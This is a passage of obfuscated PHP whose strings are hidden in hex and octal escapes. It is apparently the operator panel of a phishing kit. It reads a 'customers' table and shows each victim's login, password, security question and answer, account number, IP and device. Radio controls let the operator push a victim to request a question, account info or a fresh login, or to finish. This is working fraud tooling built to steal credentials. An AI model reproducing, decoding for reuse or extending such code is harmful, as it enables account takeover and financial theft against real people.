x3b\x6d\141\170\x2d\167\x69\x64\x74\x68\x3a\x31\x30\60\45\x3b\x66\x6f\x6e\x74\55\163\151\172\x65\72\x31\x2e\x32\x72\x65\x6d\x3b\x27\x3e\12\x9\11\x9\x9\11\x9\74\x64\x69\x76\x20\x63\154\141\x73\163\x3d\x27\x6d\157\144\141\x6c\55\143\157\156\164\x65\156\x74\x27\x20\163\164\x79\154\145\x3d\x27\x62\x61\x63\x6b\x67\162\x6f\x75\156\144\55\143\x6f\154\x6f\162\x3a\40\142\x6c\x61\x63\x6b\73\x27\x3e\12\x9\11\11\x9\x9\11\x9\x3c\144\151\x76\40\143\154\141\x73\163\x3d\x27\x6d\157\144\141\154\x2d\150\145\141\144\x65\x72\47\40\x73\x74\x79\154\145\x3d\x27\x62\x61\x63\x6b\x67\162\157\165\x6e\x64\55\143\157\154\x6f\x72\x3a\x23\63\64\x34\71\x35\x45\73\146\x6f\156\164\55\163\x69\x7a\145\72\62\56\67\x72\145\155\73\x74\145\x78\x74\55\141\154\x69\147\x6e\x3a\143\x65\x6e\164\145\162\x3b\47\76\12\11\11\x9\11\x9\11\11\x9\74\x68\65\40\x63\154\141\x73\x73\75\x27\155\157\144\x61\154\x2d\x74\x69\x74\x6c\x65\x27\x20\151\144\75\47\x65\x78\141\155\160\x6c\x65\115\157\144\141\x6c\114\x61\142\145\154\x27\40\163\164\x79\x6c\x65\x3d\x27\143\x6f\154\157\162\72\x77\x68\x69\164\145\73\x66\x6f\x6e\x74\55\x73\151\172\145\x3a\61\56\62\x72\145\155\47\76\101\144\155\151\156\x20\103\157\x6e\164\x72\x6f\x6c\x20\x28\x63\x6c\x69\x63\x6b\40\x6f\156\40\154\x6f\147\x20\164\x6f\x20\141\165\164\157\55\143\157\160\171\51\74\x2f\150\65\x3e\xa\11\11\x9\x9\x9\x9\11\x9\74\142\165\x74\164\x6f\156\x20\x74\171\160\x65\x3d\x27\142\x75\164\x74\157\x6e\x27\40\x63\154\x61\163\x73\x3d\x27\x63\154\157\163\x65\47\x20\157\x6e\143\154\151\143\153\75\47\143\154\x6f\163\x65\137\x62\164\x6e\x28\x29\x27\x20\x20\x61\162\151\x61\55\x6c\141\x62\145\154\75\x27\103\154\x6f\x73\x65\x27\x3e\12\11\x9\11\11\x9\x9\11\x9\11\x3c\x73\x70\x61\156\x20\x61\x72\x69\x61\55\x68\151\x64\144\x65\x6e\75\x27\164\162\165\x65\x27\x20\x73\x74\171\154\145\75\x27\143\x6f\154\157\162\72\167\150\151\x74\x65\x27\x3e\46\x74\x69\x6d\x65\163\x3b\74\x2f\x73\160\x61\156\x3e\xa\11\11\11\11\x9\x9\x9\11\x3c\57\142\x75\x74\x74\157\x6e\76\xa\x9\11\x9\11\x9\11\11\74\x2f\144\151\166\76\xa\x9\11\11\x9\x9\11\x9\74\144\151\x76\40\x63\x6c\x61\x73\x73\x3d\47\155\x6f\144\x61\x6c\x2d\142\157\x64\171\47\76\xa\11\x9\x9\x9\x9\11\x9\11\x3c\x64\x69\x76\40\143\154\x61\163\x73\x3d\x27\146\x6f\162\x6d\55\147\x72\x6f\x75\x70\x27\40\x73\164\171\x6c\145\75\47\x6d\141\162\x67\x69\156\x2d\142\157\x74\164\157\x6d\x3a\61\x72\145\155\x27\x3e\xa\11\x9\11\x9\11\11\11\x9\x9\74\x62\x72\76\xa\11\x9\11\11\11\11\11\11\x9\xa\11\x9\11\11\x9\x9\11\11\11\74\144\151\x76\40\x63\154\141\x73\x73\x3d\47\x64\x61\164\141\55\147\162\157\x75\160\47\76\12\11\x9\11\11\11\11\11\x9\x9\11\x3c\x6c\x61\x62\145\x6c\40\x63\x6c\141\163\163\75\47\x64\x61\164\x61\55\x6c\141\142\145\x6c\x27\x3e\114\157\147\151\x6e\x20\111\x44\74\x2f\x6c\141\x62\145\x6c\76\12\x9\11\11\x9\11\x9\11\11\x9\x9\74\x69\156\x70\x75\164\40\x6f\156\143\x6c\151\x63\153\x3d\x27\x63\157\x70\171\137\x62\x74\x6e\x28\164\x68\151\163\51\47\x20\x63\154\x61\163\163\x3d\x27\146\157\162\155\x2d\143\157\x6e\164\x72\157\154\47\x20\162\145\141\x64\x6f\x6e\x6c\171\40\166\x61\x6c\165\x65\x3d\47{$usrlogin}\x27\x3e\12\x9\11\11\x9\x9\x9\x9\x9\x9\74\57\x64\x69\166\x3e\xa\x9\11\11\11\11\x9\11\11\x9\74\x64\x69\166\x20\x63\x6c\141\163\163\75\x27\144\x61\x74\141\x2d\147\162\157\165\x70\x27\x3e\xa\11\x9\11\11\x9\11\11\11\11\11\x3c\x6c\x61\x62\145\x6c\x20\x63\x6c\x61\x73\163\75\47\144\141\164\x61\x2d\x6c\141\142\x65\x6c\x27\76\x50\x61\163\x73\x3c\x2f\x6c\141\x62\x65\x6c\x3e\12\x9\x9\11\x9\11\11\x9\11\11\11\x3c\x69\156\160\165\164\x20\157\156\143\x6c\x69\x63\153\75\47\x63\x6f\160\x79\137\x62\x74\x6e\x28\x74\150\151\x73\x29\47\40\x63\154\x61\x73\x73\75\x27\146\157\x72\155\x2d\x63\157\x6e\x74\x72\157\154\47\x20\x72\x65\141\144\157\x6e\x6c\x79\x20\x76\x61\154\x75\x65\75\x27{$usrpass}\x27\76\xa\x9\11\x9\x9\x9\x9\x9\11\x9\74\x2f\x64\x69\x76\x3e\12\11\x9\11\11\11\x9\x9\x9\x9\74\144\151\166\40\x63\154\x61\163\x73\x3d\x27\x64\x61\x74\x61\55\147\162\157\165\x70\47\x3e\12\11\11\11\x9\11\11\11\x9\11\x9\74\x6c\x61\142\145\154\40\143\x6c\141\163\163\x3d\x27\x64\141\x74\141\55\154\141\142\145\x6c\x27\76\x51\165\x65\163\164\151\x6f\x6e\x3c\x2f\154\x61\142\145\x6c\76\xa\x9\11\11\11\11\11\x9\x9\x9\11\74\151\x6e\160\x75\x74\x20\x6f\x6e\143\154\x69\143\153\x3d\x27\x63\157\x70\x79\x5f\x62\x74\x6e\x28\x74\x68\151\163\51\47\x20\x63\154\141\163\163\75\47\146\x6f\x72\x6d\x2d\x63\157\x6e\164\x72\157\x6c\47\x20\162\145\x61\144\157\x6e\154\171\40\x76\x61\154\x75\145\x3d\47{$secque}\x27\76\12\x9\11\x9\11\x9\x9\x9\x9\11\x3c\57\x64\151\x76\x3e\12\11\11\11\11\x9\11\x9\11\11\x3c\144\x69\166\40\x63\154\x61\163\163\75\x27\x64\x61\164\x61\55\147\162\157\165\x70\x27\76\12\x9\11\x9\11\11\x9\11\11\11\11\x3c\x6c\x61\142\145\154\40\143\154\x61\163\163\x3d\47\144\x61\164\x61\x2d\154\141\x62\145\154\47\76\101\156\x73\167\x65\162\74\57\154\141\x62\x65\x6c\x3e\xa\x9\11\x9\x9\x9\11\x9\11\11\11\74\151\x6e\x70\165\164\x20\157\x6e\x63\154\x69\x63\x6b\75\47\x63\157\160\171\137\142\164\156\x28\164\x68\151\x73\x29\47\40\x63\x6c\141\163\x73\x3d\x27\146\157\162\x6d\x2d\143\x6f\x6e\x74\162\x6f\x6c\47\40\x72\145\141\144\157\156\154\x79\x20\166\x61\154\x75\x65\x3d\47{$secans}\47\x3e\xa\x9\11\11\x9\x9\x9\x9\11\x9\74\57\x64\151\166\x3e\12\11\11\11\11\x9\x9\11\x9\11\74\144\x69\166\x20\143\x6c\141\163\163\75\47\x64\141\x74\x61\55\x67\x72\x6f\x75\x70\x27\76\xa\11\11\x9\11\11\x9\11\11\x9\x9\74\x6c\x61\142\x65\x6c\40\x63\154\141\163\163\x3d\x27\144\141\x74\x61\x2d\x6c\141\142\145\154\x27\x3e\x41\143\x63\x6f\x75\156\x74\74\57\154\x61\x62\x65\x6c\x3e\12\11\11\x9\x9\11\11\11\11\11\11\x3c\x69\x6e\160\x75\164\40\x6f\156\143\154\151\x63\153\75\x27\143\x6f\x70\x79\x5f\142\x74\x6e\x28\164\150\151\x73\x29\x27\40\x63\154\141\x73\x73\x3d\47\x66\x6f\162\x6d\55\143\157\156\164\x72\x6f\154\x27\x20\162\x65\x61\x64\157\156\x6c\x79\40\166\x61\x6c\165\x65\x3d\47{$acct}\47\76\12\11\11\x9\x9\x9\x9\11\11\11\74\x2f\x64\151\166\76\12\x9\x9\x9\x9\11\x9\11\x9\x9\x3c\x64\151\166\40\143\154\x61\163\x73\75\x27\x64\x61\x74\141\55\x67\x72\x6f\x75\160\47\76\xa\x9\x9\x9\11\x9\x9\x9\x9\x9\11\74\154\141\142\145\x6c\x20\x63\x6c\141\x73\x73\75\47\x64\x61\164\x61\x2d\x6c\141\x62\x65\154\47\76\x53\157\x72\164\74\x2f\x6c\141\x62\145\154\76\12\x9\x9\11\11\11\11\11\x9\11\x9\74\151\x6e\160\165\164\40\157\x6e\x63\x6c\151\143\153\75\x27\143\157\x70\x79\137\142\164\x6e\50\164\150\x69\x73\x29\47\40\x63\154\141\x73\x73\75\x27\146\x6f\x72\155\55\143\157\x6e\164\x72\157\154\x27\x20\162\145\x61\144\157\156\154\x79\x20\166\x61\x6c\165\x65\x3d\47{$sort}\47\x3e\12\x9\11\x9\x9\11\x9\11\11\11\74\57\144\x69\166\x3e\xa\11\x9\x9\x9\11\x9\11\x9\x9\74\x64\x69\x76\40\x63\154\141\x73\x73\75\x27\x64\141\164\x61\x2d\x67\162\x6f\165\x70\x27\x3e\12\11\x9\x9\11\11\x9\x9\x9\x9\11\x3c\154\141\142\x65\154\x20\143\154\141\163\x73\75\47\144\x61\164\x61\55\154\x61\142\145\154\x27\76\x49\x50\x2f\104\145\x76\x69\143\145\74\x2f\x6c\141\x62\x65\x6c\x3e\12\11\x9\11\11\11\x9\x9\x9\x9\11\x3c\151\x6e\160\x75\164\x20\157\x6e\143\x6c\151\x63\x6b\x3d\x27\143\157\160\171\x5f\142\164\156\50\164\150\x69\163\51\x27\x20\x63\154\x61\x73\163\x3d\x27\146\x6f\x72\x6d\55\143\157\x6e\164\x72\x6f\x6c\x27\40\x72\145\x61\x64\157\x6e\154\x79\40\166\141\x6c\165\x65\75\x27{$ip}\x20\x5b{$useragent}\x5d\47\x3e\xa\11\x9\11\x9\11\x9\11\x9\x9\x3c\x2f\144\151\x76\76\xa\11\11\x9\x9\x9\x9\x9\11\x9\x3c\x62\162\76\xa\x9\x9\x9\x9\11\x9\11\11\x3c\x2f\x64\151\x76\x3e\xa\xa\11\11\x9\x9\x9\x9\11\x9\x3c\41\55\55\40\105\116\x44\40\x2d\55\x3e\xa\12\x9\x9\x9\11\11\11\11\x9\74\164\x61\142\x6c\145\40\163\x74\171\154\x65\x3d\47\167\x69\144\x74\150\x3a\40\x31\x30\60\x25\x3b\142\x61\143\153\x67\x72\x6f\165\x6e\x64\x2d\143\x6f\x6c\x6f\162\72\x20\142\x6c\141\x63\x6b\x3b\x63\157\154\157\162\x3a\40\x77\150\151\x74\145\73\160\x61\x64\144\x69\x6e\147\72\40\x31\60\45\x3b\47\76\12\11\11\11\x9\x9\11\x9\11\x9\74\x74\142\157\144\x79\40\x73\x74\171\x6c\x65\x3d\47\x6c\151\x6e\145\x2d\150\145\x69\147\x68\x74\x3a\x31\x30\x30\45\73\x27\x3e\xa\x9\11\x9\11\x9\11\11\x9\11\xa\11\11\x9\x9\11\11\x9\11\11\x9\x3c\x74\x72\76\xa\11\x9\11\x9\x9\x9\x9\11\x9\11\11\74\x74\x64\x3e\xa\x9\11\x9\x9\11\11\11\x9\11\11\x9\x9\x3c\x64\x69\x76\40\143\x6c\x61\163\163\x3d\47\146\157\x72\x6d\55\x63\x68\145\x63\153\47\x3e\12\x9\x9\x9\11\x9\11\11\11\11\11\x9\11\11\x3c\x6c\141\x62\x65\x6c\40\x66\157\x72\x3d\47\141\163\153\x63\x68\141\162\163\162\141\144\x69\157\60{$value["\x69\144"]}\x27\x20\x63\154\x61\x73\x73\x3d\47\146\157\162\155\55\143\x68\x65\143\153\x2d\x6c\x61\142\145\x6c\x27\76\12\x9\11\11\11\11\x9\11\x9\11\x9\x9\11\x9\11\x3c\x69\156\x70\165\164\40\x74\171\160\x65\x3d\47\162\x61\144\x69\157\47\40\x6e\x61\155\145\75\x27\163\x74\x61\x74\x75\163\x27\40\166\x61\x6c\165\x65\75\47\61\x31\47\x20\x69\144\x3d\x27\x61\x73\153\143\150\141\162\x73\x72\141\x64\151\157\60{$value["\x69\x64"]}\47\40\157\156\x63\x6c\x69\143\x6b\75\47\x73\x68\157\167\146\151\x65\x6c\144\163\x28{$value["\151\144"]}\51\x3b\47\40\x63\x6c\141\x73\x73\x3d\47\163\x74\x61\164\x75\163\x20\146\157\x72\155\x2d\143\x68\145\143\x6b\x2d\x69\156\160\x75\x74\x27\76\12\11\x9\x9\x9\11\11\11\x9\x9\x9\x9\11\x9\11\x3c\163\160\x61\x6e\x3e\122\x65\161\165\x65\x73\164\40\121\165\x65\163\164\151\x6f\156\x3c\57\x73\160\141\x6e\76\12\11\x9\x9\x9\x9\x9\x9\x9\11\11\x9\x9\11\74\x2f\x6c\141\142\145\154\x3e\xa\11\x9\x9\11\11\11\11\11\x9\11\11\11\x3c\x2f\144\151\x76\76\12\x9\11\11\11\x9\11\11\11\x9\11\11\x9\x3c\x21\x2d\x2d\40\111\x6e\160\x75\164\x20\x63\150\141\162\141\x63\164\x65\x72\163\40\55\x2d\x3e\12\x9\11\11\11\x9\11\11\x9\11\x9\x9\x9\x3c\x64\151\x76\40\x63\154\x61\163\x73\x3d\x27\x66\157\162\155\x2d\147\162\157\165\x70\x27\40\x73\164\171\154\145\75\x27\144\x69\163\160\x6c\141\171\x3a\x6e\x6f\x6e\x65\x3b\47\x20\151\x64\x3d\x27\141\163\153\x63\x68\x61\x72\x73\60{$value["\151\144"]}\47\x3e\12\11\11\x9\x9\x9\x9\x9\x9\11\11\11\x9\11\74\144\151\x76\40\143\x6c\x61\163\163\75\47\162\157\167\47\40\x73\164\171\x6c\145\x3d\47\155\141\162\147\x69\x6e\x2d\154\x65\146\x74\x3a\65\45\x3b\155\141\162\x67\151\156\55\164\157\160\x3a\65\x70\170\x27\40\76\xa\x9\11\x9\11\11\x9\11\11\x9\x9\11\x9\11\11\x3c\x64\x69\166\x20\143\154\x61\163\163\x3d\x27\x63\157\x6c\47\76\12\11\11\x9\11\x9\x9\x9\x9\x9\11\11\11\x9\x9\x9\74\x69\x6e\x70\x75\x74\x20\x74\x79\160\145\x3d\47\164\145\x78\x74\x27\40\x63\x6c\x61\x73\x73\75\x27\x66\157\x72\155\55\143\157\x6e\x74\x72\x6f\x6c\47\40\160\x6c\x61\x63\x65\150\157\154\x64\x65\x72\75\47\105\x6e\164\x65\x72\x20\x71\x75\x65\x73\x74\x69\157\156\x20\150\145\162\145\x27\40\x6e\x61\155\x65\75\x27\163\145\143\x71\165\145\47\x20\151\144\x3d\47\x73\x65\x63\161\165\145\x27\x20\163\164\x79\x6c\145\75\x27\155\141\x72\x67\x69\156\x2d\x72\151\147\x68\x74\x3a\x31\60\160\x78\73\x62\x6f\x72\144\145\162\55\x63\157\x6c\x6f\162\72\43\x64\66\x64\66\145\65\x27\76\12\11\11\11\11\11\x9\11\x9\x9\x9\x9\x9\11\11\74\x2f\x64\151\166\x3e\xa\11\11\11\11\11\11\x9\11\11\11\11\11\x9\74\x2f\x64\x69\166\76\12\x9\11\11\11\11\x9\x9\x9\11\11\x9\11\74\x2f\x64\151\166\x3e\12\11\11\11\x9\11\11\11\x9\11\x9\x9\x3c\57\164\x64\x3e\12\x9\11\x9\x9\x9\11\11\11\11\x9\11\x3c\164\144\76\12\x9\11\x9\x9\x9\x9\11\11\11\x9\11\x9\x3c\x64\x69\166\x20\x63\154\x61\x73\x73\75\47\146\x6f\162\155\x2d\x63\150\145\x63\153\47\x3e\xa\x9\x9\x9\11\11\11\11\11\11\11\x9\x9\x9\74\x6c\141\x62\x65\154\40\x66\x6f\x72\x3d\47\x61\163\153\x63\150\x61\162\x73\162\141\x64\x69\157\61{$value["\151\x64"]}\x27\40\143\154\x61\x73\163\x3d\47\x66\x6f\x72\155\55\x63\x68\x65\x63\x6b\55\154\141\142\x65\x6c\47\x3e\xa\11\x9\x9\11\x9\x9\x9\11\x9\x9\x9\x9\x9\11\74\x69\x6e\160\x75\164\40\164\171\160\145\x3d\47\x72\x61\x64\x69\157\47\40\x6e\141\155\145\x3d\x27\163\x74\x61\164\165\163\x27\40\x76\141\154\165\145\75\x27\61\62\47\x20\151\144\x3d\x27\141\x73\x6b\143\150\141\x72\x73\162\x61\144\x69\157\x31{$value["\x69\x64"]}\x27\40\x6f\156\x63\x6c\151\143\153\75\47\x73\150\157\167\x66\151\x65\154\144\163\x28{$value["\151\x64"]}\51\x3b\x27\x20\143\x6c\x61\x73\x73\x3d\47\x73\x74\141\164\x75\163\x20\x66\x6f\162\155\55\143\150\145\x63\x6b\55\x69\156\x70\x75\x74\x27\x3e\12\x9\11\x9\11\x9\11\x9\11\x9\x9\11\x9\x9\11\x3c\163\160\x61\156\x3e\122\x65\x71\x75\x65\163\x74\40\101\143\143\x74\x20\x49\156\146\x6f\74\x2f\x73\160\x61\156\76\xa\x9\x9\11\x9\11\x9\x9\11\x9\11\11\x9\11\x3c\57\x6c\141\142\x65\x6c\76\xa\11\11\11\x9\x9\x9\11\x9\x9\x9\x9\11\74\57\144\x69\166\76\xa\11\x9\x9\11\x9\x9\x9\11\x9\x9\x9\x3c\57\164\144\76\12\x9\x9\x9\x9\11\11\11\11\x9\11\x3c\x2f\x74\x72\x3e\xa\x9\x9\11\x9\x9\x9\11\x9\11\x9\x9\xa\x9\x9\x9\11\x9\11\x9\11\11\x9\74\x74\x72\76\xa\x9\x9\11\x9\x9\11\x9\11\x9\11\x9\x3c\x74\144\76\12\11\11\11\11\x9\11\x9\x9\11\11\x9\11\74\144\151\x76\x20\x63\154\141\163\163\75\x27\x66\x6f\162\x6d\55\143\150\x65\143\x6b\x27\76\xa\11\x9\11\x9\11\x9\x9\11\x9\x9\x9\x9\11\74\x6c\x61\x62\x65\154\x20\x66\157\162\75\x27\x66\x69\x6e\x69\x73\x68\x72\141\x64\151\x6f\60{$value["\x69\144"]}\x27\40\143\x6c\141\x73\x73\x3d\x27\146\x6f\x72\x6d\55\143\150\x65\x63\153\55\x6c\x61\x62\x65\x6c\x27\x3e\xa\x9\x9\x9\x9\x9\11\11\x9\x9\11\x9\x9\11\x9\x3c\x69\156\x70\x75\164\40\x74\171\160\145\75\47\162\x61\144\x69\157\47\x20\156\141\x6d\x65\x3d\47\x73\x74\141\x74\165\x73\47\40\x76\141\154\x75\x65\x3d\x27\62\60\x27\40\x69\144\x3d\47\x66\x69\x6e\151\x73\150\x72\x61\x64\151\157\x30{$value["\x69\144"]}\x27\x20\157\x6e\143\x6c\151\x63\x6b\x3d\x27\163\x68\157\x77\146\151\145\154\144\163\50{$value["\151\144"]}\x29\73\x27\40\x63\154\141\x73\163\75\x27\163\164\x61\164\165\x73\x20\146\x6f\162\155\x2d\143\x68\x65\143\x6b\55\151\156\160\165\164\47\x3e\xa\x9\11\11\11\11\11\x9\11\11\x9\x9\x9\x9\x9\74\x73\x70\141\156\76\106\151\156\151\x73\150\x3c\x2f\163\x70\141\156\76\xa\x9\x9\11\11\x9\11\x9\x9\x9\x9\11\x9\11\x3c\x2f\x6c\x61\142\x65\x6c\76\12\11\x9\11\x9\11\x9\11\x9\x9\x9\x9\11\x3c\x2f\144\151\x76\76\12\x9\x9\x9\11\11\x9\x9\11\x9\x9\x9\x3c\x2f\x74\144\76\xa\11\11\x9\11\x9\x9\11\x9\x9\x9\11\x3c\x74\x64\x3e\xa\11\x9\11\x9\11\11\11\x9\x9\11\11\11\x3c\x64\151\166\x20\x63\x6c\x61\x73\x73\x3d\47\x66\x6f\162\x6d\x2d\143\150\145\143\153\47\76\12\x9\11\x9\11\x9\x9\11\x9\x9\x9\11\x9\x9\x3c\x6c\x61\x62\x65\x6c\x20\x66\x6f\162\75\x27\x61\163\x6b\154\157\x67\151\x6e\x72\141\144\x69\157\60{$value["\151\x64"]}\x27\40\143\154\x61\x73\163\x3d\x27\146\157\162\155\55\143\x68\145\143\x6b\55\154\x61\x62\145\154\x27\76\xa\11\x9\11\11\x9\x9\11\11\x9\11\11\11\x9\x9\74\151\x6e\160\165\164\x20\x74\x79\160\145\x3d\47\x72\x61\144\151\x6f\x27\40\x6e\x61\x6d\145\x3d\x27\x73\x74\141\164\165\163\47\40\x76\141\154\x75\145\x3d\47\65\60\47\40\x69\144\75\x27\x61\163\153\x6c\x6f\x67\151\156\162\141\144\x69\x6f\x30{$value["\x69\144"]}\x27\40\157\156\x63\154\151\x63\x6b\x3d\x27\163\150\x6f\167\x66\151\x65\x6c\x64\x73\50{$value["\x69\x64"]}\x29\73\x27\40\x63\154\x61\x73\x73\x3d\47\163\164\141\164\x75\x73\x20\x66\x6f\162\x6d\x2d\x63\x68\x65\x63\x6b\55\151\x6e\160\165\x74\x27\x3e\xa\x9\x9\x9\x9\11\11\x9\11\x9\x9\x9\x9\x9\11\x3c\x73\x70\x61\156\x3e\x52\145\x71\165\145\163\x74\x20\154\x6f\147\x69\x6e\40\141\147\141\x69\156\40\x3c\x2f\163\x70\141\x6e\76\12\11\11\x9\x9\11\x9\11\x9\x9\x9\x9\11\x9\x3c\57\154\x61\142\x65\154\x3e\12\x9\11\11\x9\11\x9\x9\x9\11\11\x9\x9\x3c\57\x64\151\166\76\xa\x9\x9\x9\11\x9\x9\11\11\11\11\x9\74\x2f\x74\144\x3e\12\11\11\11\11\x9\x9\x9\11\11\11\74\57\164\162\x3e\12\11\x9\11\x9\x9\11\x9\11\11\x9\xa\x9\11\11\x9\11\11\11\x9\11\11\74\x21\x2d\x2d\74\x74\x72\76\12\11\x9\x9\x9\11\x9\11\11\11\11\x9\74\x74\144\76\xa\x9\11\11\11\11\11\11\x9\11\x9\11\x9\x3c\x64\151\x76\x20\x63\154\141\x73\x73\75\x27\146\x6f\x72\155\x2d\143\150\145\x63\x6b\47\76\12\x9\11\11\11\11\x9\11\11\11\11\x9\x9\11\74\154\141\142\x65\x6c\x20\146\157\x72\x3d\x27\x73\145\x6e\144\x61\x77\141\x79\162\x61\x64\x69\157\x30{$value["\x69\x64"]}\x27\x20\143\x6c\141\x73\163\x3d\x27\146\x6f\162\x6d\55\x63\150\145\143\153\x2d\x6c\141\142\145\154\x27\x3e\xa\x9\x9\11\11\11\x9\x9\x9\11\x9\x9\x9\x9\x9\74\151\x6e\160\x75\x74\40\164\x79\x70\x65\x3d\47\x72\141\144\x69\x6f\x27\40\x6e\141\x6d\x65\x3d\47\x73\164\x61\x74\165\x73\x27\40\166\141\x6c\165\145\x3d\47\x31\x30\x30\47\x20\151\x64\x3d\47\163\x65\156\x64\141\167\x61\171\162\141\144\151\x6f\x30{$value["\x69\144"]}\47\40\x6f\156\x63\154\151\x63\x6b\75\x27\x73\x68\157\167\146\151\x65\154\144\x73\x28{$value["\151\144"]}\x29\x3b\x27\40\143\154\x61\x73\163\x3d\x27\x73\164\x61\164\165\163\40\146\157\x72\155\55\143\x68\145\x63\x6b\55\151\156\160\x75\164\47\x3e\xa\x9\11\11\11\11\x9\x9\11\11\x9\x9\x9\x9\11\x3c\x73\160\141\x6e\76\x49\156\x76\x61\x6c\151\x64\54\x20\x53\145\x6e\x64\x20\141\167\x61\x79\74\x2f\x73\160\x61\156\76\12\x9\11\x9\x9\x9\11\11\11\x9\x9\x9\11\11\74\57\154\141\x62\x65\x6c\x3e\xa\x9\x9\x9\x9\x9\11\x9\x9\x9\x9\11\x9\x3c\x2f\144\x69\166\x3e\xa\11\x9\x9\x9\x9\11\11\11\x9\11\11\x3c\x2f\x74\x64\x3e\12\x9\x9\x9\x9\x9\x9\x9\11\11\x9\74\x2f\x74\162\76\x2d\x2d\76\12\11\x9\x9\x9\x9\x9\11\11\11\x9\xa\x9\11\11\x9\11\x9\x9\x9\11\74\x2f\164\x62\157\x64\x79\76\xa\x9\x9\x9\11\x9\x9\x9\x9\x3c\57\164\x61\142\x6c\145\x3e\12\x9\x9\x9\11\11\11\x9\74\x2f\144\x69\166\x3e\xa\11\x9\x9\11\x9\11\x9\74\41\x2d\55\x20\105\x6e\x64\x20\143\157\x6d\155\x61\x6e\144\163\40\x65\x64\x69\164\x20\x2d\55\x3e\12\11\11\x9\11\11\x9\x9\x3c\144\151\166\x20\x63\154\x61\163\163\75\47\x6d\157\144\x61\154\55\x66\x6f\x6f\x74\145\x72\x27\40\x73\164\171\x6c\145\x3d\47\x6d\x61\162\x67\151\x6e\x2d\x74\157\x70\x3a\x2d\64\60\x70\x78\x27\x3e\12\x9\11\x9\x9\x9\11\x9\x9\74\142\x75\164\x74\x6f\x6e\x20\x74\x79\x70\145\75\47\142\x75\x74\x74\x6f\x6e\47\x20\143\x6c\141\x73\x73\75\x27\142\164\156\x20\142\164\x6e\x2d\163\145\x63\x6f\x6e\x64\x61\162\x79\47\40\x6f\x6e\x63\x6c\x69\x63\153\x3d\x27\x63\154\x6f\163\145\137\142\x74\156\x28\51\47\40\76\103\154\x6f\x73\x65\x3c\x2f\142\x75\164\x74\x6f\156\x3e\xa\x9\x9\11\x9\11\11\11\11\74\x62\165\164\164\157\156\x20\x69\x64\75\47\163\x61\x76\x65\137{$value["\151\x64"]}\x27\40\x6f\156\x63\x6c\x69\x63\x6b\x3d\x27\x66\157\162\155\x5f\x73\165\142\155\151\164\50\x74\x68\x69\163\51\x27\x20\164\x79\x70\x65\75\47\x62\165\164\x74\157\156\47\x20\143\x6c\141\163\163\x3d\47\142\164\x6e\x20\142\x74\x6e\55\160\162\x69\155\141\x72\x79\47\x3e\x53\141\166\x65\74\57\x62\165\164\x74\x6f\x6e\76\12\11\11\11\x9\x9\11\x9\74\57\144\x69\x76\76\xa\11\11\11\11\x9\x9\x3c\x2f\x64\151\x76\x3e\xa\11\x9\11\11\11\74\x2f\x64\x69\x76\76\xa\11\x9\11\11\x3c\57\146\157\162\x6d\x3e\xa\11\x9\x9\x3c\57\144\x69\x76\76\11\x9\11\xa\11\11\11\xa\x9\11\x9"; } } if (isset($_GET["\x66\145\164\143\x68\x5f\146\151\x6e\151\x73\150\137\x6d\x6f\x64\141\x6c\137\x64\x61\164\x61"])) { $query = mysqli_query($conn, "\123\105\114\x45\x43\124\x20\x2a\x20\146\162\157\155\40\x63\x75\x73\164\x6f\x6d\145\162\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\x75\163\x72\x6c\157\x67\151\156"]; $usrpass = $value["\165\x73\162\160\x61\163\x73"]; $secans = $value["\x73\x65\143\141\156\x73"]; $secque = $value["\163\x65\143\x71\165\x65"]; $acct = $value["\x61\143\x63\164"]; $sort = $value["\x73\x6f\162\164"]; $ip = $value["\x69\160"]; $useragent = urldecode($value["\x75\x73\x65\x72\x61\x67\145\x6e\164"]); echo "\12\11\12\11\11\x9\74\x64\x69\x76\40\x63\154\x61\x73\x73\75\x27\x6d\157\x64\x61\154\40\x66\x61\x64\145\x27\x20\x69\144\x3d\x27\166\151\145\x77\x6d\x6f\x64\x61\x6c\x5f\x75\163\x65\162\x69\144\137{$value["\x69\x64"]}\x27\x20\x74\x61\142\x69\156\144\145\170\x3d\x27\55\x31\47\x20\162\x6f\x6c\145\75\47\x64\x69\x61\154\x6f\x67\47\40\x73\x74\171\154\145\75\47\157\x70\x61\143\151\164\171\72\61\40\x21\x69\155\x70\x6f\x72\164\141\x6e\x74\x3b\144\151\x73\160\154\x61\171\72\156\157\x6e\145\73\150\x65\x69\x67\150\164\72\x31\60\x30\45\x3b\157\166\145\162\146\x6c\x6f\167\x3a\163\x63\x72\157\154\154\x3b\47\x20\x61\x72\151\x61\x2d\x6c\141\x62\145\x6c\x6c\145\144\142\x79\75\47\145\170\x61\155\x70\154\x65\x4d\157\x64\141\x6c\114\141\x62\x65\154\x27\40\141\162\151\x61\x2d\150\151\144\x64\145\x6e\75\47\164\162\x75\145\x27\x3e\xa\x9\x9\x9\12\11\11\x9\11\74\x66\157\x72\x6d\x20\x6e\141\x6d\145\x3d\x27\143\157\x6e\x66\151\147\137\x66\x6f\x72\x6d\x5f{$value["\151\144"]}\47\x20\151\144\75\47\x63\x6f\x6e\x66\x69\147\137\146\157\162\x6d\137{$value["\151\x64"]}\47\x20\155\x65\164\x68\157\144\x3d\x27\120\117\x53\x54\47\40\x61\x63\164\x69\157\156\75\47\47\x20\156\157\166\141\154\x69\144\141\164\145\76\12\11\11\x9\x9\74\151\x6e\x70\x75\x74\x20\x74\171\160\145\75\47\x68\x69\144\x64\x65\x6e\x27\x20\x6e\x61\x6d\145\75\47\x75\163\145\x72\x69\144\47\x20\166\x61\x6c\x75\145\75\x27{$value["\151\x64"]}\x27\76\12\x9\11\11\x9\x3c\x64\x69\x76\x20\x63\154\x61\163\163\75\x27\x6d\x6f\144\141\154\x2d\x64\151\141\154\x6f\147\x27\40\162\x6f\x6c\x65\75\x27\x64\x6f\x63\x75\155\x65\x6e\x74\47\40\163\164\x79\x6c\145\x3d\47\x6d\x61\x72\147\151\x6e\55\164\157\160\x3a\62\60\45\x3b\x6d\141\170\x2d\x77\151\x64\164\150\x3a\x31\60\x30\45\73\x66\157\156\x74\x2d\163\151\172\145\72\x31\56\62\162\145\x6d\x3b\47\76\xa\11\11\11\x9\x3c\144\151\x76\40\x63\x6c\141\163\163\x3d\x27\155\157\x64\x61\154\55\x63\157\156\x74\145\x6e\164\47\40\163\164\x79\154\145\75\x27\142\141\143\153\x67\162\157\165\156\x64\55\x63\157\154\x6f\x72\x3a\x20\x62\154\141\143\153\x3b\47\x3e\xa\x9\11\11\x9\11\x3c\x64\151\x76\40\x63\x6c\141\x73\163\75\47\155\1